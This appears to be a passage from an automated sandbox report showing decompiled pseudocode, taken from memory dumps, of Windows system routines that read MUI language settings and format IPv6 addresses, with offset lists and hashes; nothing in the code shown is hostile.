                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00C88788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				short* _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _v32;
                                                                                                                                                    				char _v36;
                                                                                                                                                    				signed int _v40;
                                                                                                                                                    				char _v44;
                                                                                                                                                    				signed int _v48;
                                                                                                                                                    				signed int _v52;
                                                                                                                                                    				signed int _v56;
                                                                                                                                                    				signed int _v60;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				void* _t216;
                                                                                                                                                    				intOrPtr _t231;
                                                                                                                                                    				short* _t235;
                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                    				short* _t261;
                                                                                                                                                    				intOrPtr _t284;
                                                                                                                                                    				intOrPtr _t288;
                                                                                                                                                    				void* _t314;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				short* _t319;
                                                                                                                                                    				intOrPtr _t321;
                                                                                                                                                    				void* _t328;
                                                                                                                                                    				void* _t329;
                                                                                                                                                    				char* _t332;
                                                                                                                                                    				signed int _t333;
                                                                                                                                                    				signed int* _t334;
                                                                                                                                                    				void* _t335;
                                                                                                                                                    				void* _t338;
                                                                                                                                                    				void* _t339;
                                                                                                                                                    
                                                                                                                                                    				_t328 = __edx;
                                                                                                                                                    				_t322 = __ecx;
                                                                                                                                                    				_t318 = 0;
                                                                                                                                                    				_t334 = _a4;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_v48 = 0;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v40 = 0;
                                                                                                                                                    				_v32 = 0;
                                                                                                                                                    				_v52 = 0;
                                                                                                                                                    				if(_t334 == 0) {
                                                                                                                                                    					_t329 = 0xc000000d;
                                                                                                                                                    					L49:
                                                                                                                                                    					_t334[0x11] = _v56;
                                                                                                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                    					_t334[0x12] = _v60;
                                                                                                                                                    					_t334[0x13] = _v28;
                                                                                                                                                    					_t334[0x17] = _v20;
                                                                                                                                                    					_t334[0x16] = _v48;
                                                                                                                                                    					_t334[0x18] = _v40;
                                                                                                                                                    					_t334[0x14] = _v32;
                                                                                                                                                    					_t334[0x15] = _v52;
                                                                                                                                                    					return _t329;
                                                                                                                                                    				}
                                                                                                                                                    				_v56 = 0;
                                                                                                                                                    				if(E00C88460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_v56 = 1;
                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                    						_t207 = E00C6E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_push(1);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E00C8718A(_t207);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_v60 = _v60 | 0xffffffff;
                                                                                                                                                    				if(E00C88460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_t333 =  *_v8;
                                                                                                                                                    					_v60 = _t333;
                                                                                                                                                    					_t314 = E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					_push(_t333);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E00C8718A(_t314);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_t216 = E00C88460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                    				_t332 = ";";
                                                                                                                                                    				if(_t216 < 0) {
                                                                                                                                                    					L17:
                                                                                                                                                    					if(E00C88460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    						L30:
                                                                                                                                                    						if(E00C88460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    							L46:
                                                                                                                                                    							_t329 = 0;
                                                                                                                                                    							L47:
                                                                                                                                                    							if(_v8 != _t318) {
                                                                                                                                                    								E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							if(_v28 != _t318) {
                                                                                                                                                    								if(_v20 != _t318) {
                                                                                                                                                    									E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    									_v20 = _t318;
                                                                                                                                                    									_v40 = _t318;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							goto L49;
                                                                                                                                                    						}
                                                                                                                                                    						_t231 = _v24;
                                                                                                                                                    						_t322 = _t231 + 4;
                                                                                                                                                    						_push(_t231);
                                                                                                                                                    						_v52 = _t322;
                                                                                                                                                    						E00C8718A(_t231);
                                                                                                                                                    						if(_t322 == _t318) {
                                                                                                                                                    							_v32 = _t318;
                                                                                                                                                    						} else {
                                                                                                                                                    							_v32 = E00C6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v32 == _t318) {
                                                                                                                                                    							_v52 = _t318;
                                                                                                                                                    							L58:
                                                                                                                                                    							_t329 = 0xc0000017;
                                                                                                                                                    							goto L47;
                                                                                                                                                    						} else {
                                                                                                                                                    							E00C62340(_v32, _v8, _v24);
                                                                                                                                                    							_v16 = _v32;
                                                                                                                                                    							_a4 = _t318;
                                                                                                                                                    							_t235 = E00C7E679(_v32, _t332);
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t319 = _t235;
                                                                                                                                                    								if(_t319 == 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								 *_t319 = 0;
                                                                                                                                                    								_t321 = _t319 + 2;
                                                                                                                                                    								E00C6E2A8(_t322,  &_v68, _v16);
                                                                                                                                                    								if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    								_v16 = _t321;
                                                                                                                                                    								_t235 = E00C7E679(_t321, _t332);
                                                                                                                                                    								_pop(_t322);
                                                                                                                                                    							}
                                                                                                                                                    							_t236 = _v16;
                                                                                                                                                    							if( *_v16 != _t319) {
                                                                                                                                                    								E00C6E2A8(_t322,  &_v68, _t236);
                                                                                                                                                    								if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							if(_a4 == 0) {
                                                                                                                                                    								E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                    								_v52 = _v52 & 0x00000000;
                                                                                                                                                    								_v32 = _v32 & 0x00000000;
                                                                                                                                                    							}
                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                    								E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                                    							_t318 = 0;
                                                                                                                                                    							goto L46;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t257 = _v24;
                                                                                                                                                    					_t322 = _t257 + 4;
                                                                                                                                                    					_push(_t257);
                                                                                                                                                    					_v40 = _t322;
                                                                                                                                                    					E00C8718A(_t257);
                                                                                                                                                    					_t338 = _t335 + 4;
                                                                                                                                                    					if(_t322 == _t318) {
                                                                                                                                                    						_v20 = _t318;
                                                                                                                                                    					} else {
                                                                                                                                                    						_v20 = E00C6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v20 == _t318) {
                                                                                                                                                    						_v40 = _t318;
                                                                                                                                                    						goto L58;
                                                                                                                                                    					} else {
                                                                                                                                                    						E00C62340(_v20, _v8, _v24);
                                                                                                                                                    						_v16 = _v20;
                                                                                                                                                    						_a4 = _t318;
                                                                                                                                                    						_t261 = E00C7E679(_v20, _t332);
                                                                                                                                                    						_t335 = _t338 + 0x14;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_v12 = _t261;
                                                                                                                                                    							if(_t261 == _t318) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_v12 = _v12 + 2;
                                                                                                                                                    							 *_v12 = 0;
                                                                                                                                                    							E00C6E2A8(_v12,  &_v68, _v16);
                                                                                                                                                    							if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v12;
                                                                                                                                                    							_t261 = E00C7E679(_v12, _t332);
                                                                                                                                                    							_pop(_t322);
                                                                                                                                                    						}
                                                                                                                                                    						_t269 = _v16;
                                                                                                                                                    						if( *_v16 != _t318) {
                                                                                                                                                    							E00C6E2A8(_t322,  &_v68, _t269);
                                                                                                                                                    							if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						if(_a4 == _t318) {
                                                                                                                                                    							E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    							_v40 = _t318;
                                                                                                                                                    							_v20 = _t318;
                                                                                                                                                    						}
                                                                                                                                                    						if(_v8 != _t318) {
                                                                                                                                                    							E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    						}
                                                                                                                                                    						_v8 = _t318;
                                                                                                                                                    						goto L30;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t284 = _v24;
                                                                                                                                                    				_t322 = _t284 + 4;
                                                                                                                                                    				_push(_t284);
                                                                                                                                                    				_v48 = _t322;
                                                                                                                                                    				E00C8718A(_t284);
                                                                                                                                                    				_t339 = _t335 + 4;
                                                                                                                                                    				if(_t322 == _t318) {
                                                                                                                                                    					_v28 = _t318;
                                                                                                                                                    				} else {
                                                                                                                                                    					_v28 = E00C6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v28 == _t318) {
                                                                                                                                                    					_v48 = _t318;
                                                                                                                                                    					goto L58;
                                                                                                                                                    				} else {
                                                                                                                                                    					E00C62340(_v28, _v8, _v24);
                                                                                                                                                    					_v16 = _v28;
                                                                                                                                                    					_a4 = _t318;
                                                                                                                                                    					_t288 = E00C7E679(_v28, _t332);
                                                                                                                                                    					_t335 = _t339 + 0x14;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_v12 = _t288;
                                                                                                                                                    						if(_t288 == _t318) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_v12 = _v12 + 2;
                                                                                                                                                    						 *_v12 = 0;
                                                                                                                                                    						E00C6E2A8(_v12,  &_v68, _v16);
                                                                                                                                                    						if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						_v16 = _v12;
                                                                                                                                                    						_t288 = E00C7E679(_v12, _t332);
                                                                                                                                                    						_pop(_t322);
                                                                                                                                                    					}
                                                                                                                                                    					_t296 = _v16;
                                                                                                                                                    					if( *_v16 != _t318) {
                                                                                                                                                    						E00C6E2A8(_t322,  &_v68, _t296);
                                                                                                                                                    						if(E00C85553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					if(_a4 == _t318) {
                                                                                                                                                    						E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                    						_v48 = _t318;
                                                                                                                                                    						_v28 = _t318;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v8 != _t318) {
                                                                                                                                                    						E00C6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					goto L17;
                                                                                                                                                    				}
                                                                                                                                                    			}





































                                                                                                                                                    0x00c88a3c
                                                                                                                                                    0x00c88a3c
                                                                                                                                                    0x00c88a42
                                                                                                                                                    0x00cd1bb0
                                                                                                                                                    0x00cd1b11
                                                                                                                                                    0x00cd1b11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88a48
                                                                                                                                                    0x00c88a51
                                                                                                                                                    0x00c88a5b
                                                                                                                                                    0x00c88a5e
                                                                                                                                                    0x00c88a61
                                                                                                                                                    0x00c88a69
                                                                                                                                                    0x00c88a69
                                                                                                                                                    0x00c88a6d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88a74
                                                                                                                                                    0x00c88a7c
                                                                                                                                                    0x00c88a7d
                                                                                                                                                    0x00c88a91
                                                                                                                                                    0x00c88a93
                                                                                                                                                    0x00c88a93
                                                                                                                                                    0x00c88a98
                                                                                                                                                    0x00c88a9b
                                                                                                                                                    0x00c88aa1
                                                                                                                                                    0x00c88aa1
                                                                                                                                                    0x00c88aa4
                                                                                                                                                    0x00c88aaa
                                                                                                                                                    0x00c88ab1
                                                                                                                                                    0x00c88ac5
                                                                                                                                                    0x00c88ac7
                                                                                                                                                    0x00c88ac7
                                                                                                                                                    0x00c88ac5
                                                                                                                                                    0x00c88ace
                                                                                                                                                    0x00cd1bc9
                                                                                                                                                    0x00cd1bce
                                                                                                                                                    0x00cd1bd2
                                                                                                                                                    0x00cd1bd2
                                                                                                                                                    0x00c88ad8
                                                                                                                                                    0x00c88aeb
                                                                                                                                                    0x00c88aeb
                                                                                                                                                    0x00c88af0
                                                                                                                                                    0x00c88af4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88af4
                                                                                                                                                    0x00c88a42
                                                                                                                                                    0x00c88926
                                                                                                                                                    0x00c88929
                                                                                                                                                    0x00c8892c
                                                                                                                                                    0x00c8892d
                                                                                                                                                    0x00c88930
                                                                                                                                                    0x00c88935
                                                                                                                                                    0x00c8893a
                                                                                                                                                    0x00c88b51
                                                                                                                                                    0x00c88940
                                                                                                                                                    0x00c88954
                                                                                                                                                    0x00c88954
                                                                                                                                                    0x00c8895a
                                                                                                                                                    0x00cd1b63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88960
                                                                                                                                                    0x00c88969
                                                                                                                                                    0x00c88973
                                                                                                                                                    0x00c88976
                                                                                                                                                    0x00c88979
                                                                                                                                                    0x00c8897e
                                                                                                                                                    0x00c88981
                                                                                                                                                    0x00c88981
                                                                                                                                                    0x00c88986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cd1b6e
                                                                                                                                                    0x00cd1b74
                                                                                                                                                    0x00cd1b7b
                                                                                                                                                    0x00cd1b8f
                                                                                                                                                    0x00cd1b91
                                                                                                                                                    0x00cd1b91
                                                                                                                                                    0x00cd1b99
                                                                                                                                                    0x00cd1b9c
                                                                                                                                                    0x00cd1ba2
                                                                                                                                                    0x00cd1ba2
                                                                                                                                                    0x00c8898c
                                                                                                                                                    0x00c88992
                                                                                                                                                    0x00c88999
                                                                                                                                                    0x00c889ad
                                                                                                                                                    0x00cd1ba8
                                                                                                                                                    0x00cd1ba8
                                                                                                                                                    0x00c889ad
                                                                                                                                                    0x00c889b6
                                                                                                                                                    0x00c889c8
                                                                                                                                                    0x00c889cd
                                                                                                                                                    0x00c889d0
                                                                                                                                                    0x00c889d0
                                                                                                                                                    0x00c889d6
                                                                                                                                                    0x00c889e8
                                                                                                                                                    0x00c889e8
                                                                                                                                                    0x00c889ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c889ed
                                                                                                                                                    0x00c8895a
                                                                                                                                                    0x00c8883e
                                                                                                                                                    0x00c88841
                                                                                                                                                    0x00c88844
                                                                                                                                                    0x00c88845
                                                                                                                                                    0x00c88848
                                                                                                                                                    0x00c8884d
                                                                                                                                                    0x00c88852
                                                                                                                                                    0x00c88b49
                                                                                                                                                    0x00c88858
                                                                                                                                                    0x00c8886c
                                                                                                                                                    0x00c8886c
                                                                                                                                                    0x00c88872
                                                                                                                                                    0x00cd1b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88878
                                                                                                                                                    0x00c88881
                                                                                                                                                    0x00c8888b
                                                                                                                                                    0x00c8888e
                                                                                                                                                    0x00c88891
                                                                                                                                                    0x00c88896
                                                                                                                                                    0x00c88899
                                                                                                                                                    0x00c88899
                                                                                                                                                    0x00c8889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cd1b21
                                                                                                                                                    0x00cd1b27
                                                                                                                                                    0x00cd1b2e
                                                                                                                                                    0x00cd1b42
                                                                                                                                                    0x00cd1b44
                                                                                                                                                    0x00cd1b44
                                                                                                                                                    0x00cd1b4c
                                                                                                                                                    0x00cd1b4f
                                                                                                                                                    0x00cd1b55
                                                                                                                                                    0x00cd1b55
                                                                                                                                                    0x00c888a4
                                                                                                                                                    0x00c888aa
                                                                                                                                                    0x00c888b1
                                                                                                                                                    0x00c888c5
                                                                                                                                                    0x00cd1b5b
                                                                                                                                                    0x00cd1b5b
                                                                                                                                                    0x00c888c5
                                                                                                                                                    0x00c888ce
                                                                                                                                                    0x00c888e0
                                                                                                                                                    0x00c888e5
                                                                                                                                                    0x00c888e8
                                                                                                                                                    0x00c888e8
                                                                                                                                                    0x00c888ee
                                                                                                                                                    0x00c88900
                                                                                                                                                    0x00c88900
                                                                                                                                                    0x00c88905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c88905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 00C88914
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 00C887E6
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 00C887C1
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 00C88827
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 00C889FC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: 212a2d003c5ba1f301fe2542111c81393d93b43f3072e4563a6a6e01cae757ca
                                                                                                                                                    • Instruction ID: 77c5f41c2012b576a815de03758803a08cba251b330ff4858c3d8366c0224474
                                                                                                                                                    • Opcode Fuzzy Hash: 212a2d003c5ba1f301fe2542111c81393d93b43f3072e4563a6a6e01cae757ca
                                                                                                                                                    • Instruction Fuzzy Hash: A4F126B6D00209EFCF11EFA5C981DEEB7B8FF08304F54446AE605A7611EB349A45EB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E00CA13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                    				char _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                    				signed int _t78;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				char _t90;
                                                                                                                                                    				signed int _t91;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                    				signed int _t114;
                                                                                                                                                    				void* _t115;
                                                                                                                                                    				intOrPtr _t128;
                                                                                                                                                    				intOrPtr* _t129;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    
                                                                                                                                                    				_t129 = _a4;
                                                                                                                                                    				_t128 = _a8;
                                                                                                                                                    				_t116 = 0;
                                                                                                                                                    				_t71 = _t128 + 0x5c;
                                                                                                                                                    				_v8 = 8;
                                                                                                                                                    				_v20 = _t71;
                                                                                                                                                    				if( *_t129 == 0) {
                                                                                                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                    						goto L5;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                    						if(_t96 != 0) {
                                                                                                                                                    							L38:
                                                                                                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                    								goto L5;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t86 = E00C97707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    								L36:
                                                                                                                                                    								return _t128 + _t86 * 2;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                    						if(_t114 == 0) {
                                                                                                                                                    							L33:
                                                                                                                                                    							_t115 = 0xc62926;
                                                                                                                                                    							L35:
                                                                                                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    							_t86 = E00C97707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                    							goto L36;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0xffff) {
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L38;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0) {
                                                                                                                                                    							_t115 = 0xc69cac;
                                                                                                                                                    							goto L35;
                                                                                                                                                    						}
                                                                                                                                                    						goto L33;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L5:
                                                                                                                                                    					_a8 = _t116;
                                                                                                                                                    					_a4 = _t116;
                                                                                                                                                    					_v12 = _t116;
                                                                                                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                    							_v8 = 6;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t90 = _v8;
                                                                                                                                                    					if(_t90 <= _t116) {
                                                                                                                                                    						L11:
                                                                                                                                                    						if(_a8 - _a4 <= 1) {
                                                                                                                                                    							_a8 = _t116;
                                                                                                                                                    							_a4 = _t116;
                                                                                                                                                    						}
                                                                                                                                                    						_t91 = 0;
                                                                                                                                                    						if(_v8 <= _t116) {
                                                                                                                                                    							L22:
                                                                                                                                                    							if(_v8 < 8) {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t128 = _t128 + E00C97707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                    							}
                                                                                                                                                    							return _t128;
                                                                                                                                                    						} else {
                                                                                                                                                    							L14:
                                                                                                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                    									_push(":");
                                                                                                                                                    									_push(_t71 - _t128 >> 1);
                                                                                                                                                    									_push(_t128);
                                                                                                                                                    									_t128 = _t128 + E00C97707() * 2;
                                                                                                                                                    									_t71 = _v20;
                                                                                                                                                    									_t130 = _t130 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								_t78 = E00C97707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                    								_t130 = _t130 + 0x10;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push(L"::");
                                                                                                                                                    								_push(_t71 - _t128 >> 1);
                                                                                                                                                    								_push(_t128);
                                                                                                                                                    								_t78 = E00C97707();
                                                                                                                                                    								_t130 = _t130 + 0xc;
                                                                                                                                                    								_t91 = _a8 - 1;
                                                                                                                                                    							}
                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                    							_t128 = _t128 + _t78 * 2;
                                                                                                                                                    							_t71 = _v20;
                                                                                                                                                    							if(_t91 >= _v8) {
                                                                                                                                                    								goto L22;
                                                                                                                                                    							}
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L14;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_t108 = 1;
                                                                                                                                                    						_v16 = _t129;
                                                                                                                                                    						_v24 = _t90;
                                                                                                                                                    						do {
                                                                                                                                                    							if( *_v16 == _t116) {
                                                                                                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                    									_a4 = _v12;
                                                                                                                                                    									_a8 = _t108;
                                                                                                                                                    								}
                                                                                                                                                    								_t116 = 0;
                                                                                                                                                    							} else {
                                                                                                                                                    								_v12 = _t108;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v16 + 2;
                                                                                                                                                    							_t108 = _t108 + 1;
                                                                                                                                                    							_t26 =  &_v24;
                                                                                                                                                    							 *_t26 = _v24 - 1;
                                                                                                                                                    						} while ( *_t26 != 0);
                                                                                                                                                    						goto L11;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}




















                                                                                                                                                    0x00cce9cc
                                                                                                                                                    0x00ca140c
                                                                                                                                                    0x00ca1411
                                                                                                                                                    0x00ca1431
                                                                                                                                                    0x00ca143a
                                                                                                                                                    0x00ca143c
                                                                                                                                                    0x00ca143f
                                                                                                                                                    0x00ca143f
                                                                                                                                                    0x00ca1442
                                                                                                                                                    0x00ca1447
                                                                                                                                                    0x00ca14a8
                                                                                                                                                    0x00ca14ac
                                                                                                                                                    0x00cce9e2
                                                                                                                                                    0x00cce9e7
                                                                                                                                                    0x00cce9ec
                                                                                                                                                    0x00ccea05
                                                                                                                                                    0x00ccea05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca1449
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca1449
                                                                                                                                                    0x00ca144c
                                                                                                                                                    0x00ca1459
                                                                                                                                                    0x00ca1462
                                                                                                                                                    0x00ca1469
                                                                                                                                                    0x00ca146a
                                                                                                                                                    0x00ca1470
                                                                                                                                                    0x00ca1473
                                                                                                                                                    0x00ca1476
                                                                                                                                                    0x00ca1476
